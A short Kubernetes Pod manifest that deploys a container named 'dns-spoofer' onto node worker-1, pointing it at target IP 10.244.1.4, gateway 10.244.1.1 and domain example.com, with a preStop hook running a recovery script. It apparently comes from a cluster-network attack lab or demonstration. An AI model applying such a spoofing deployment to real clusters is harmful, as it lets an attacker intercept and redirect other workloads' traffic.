apiVersion: v1
kind: Pod
metadata:
  name: dns-spoofer
  namespace: default
spec:
  restartPolicy: Never
  nodeName: worker-1
  containers:
  - name: dns-spoofer
    image: nilement/dns-spoofer
    args: ["--target", "10.244.1.4", "--gateway", "10.244.1.1", "--domain", "example.com"]
    imagePullPolicy: Always
    lifecycle:
      preStop:
        exec:
          command: ["python3", "/src/recovery.py"]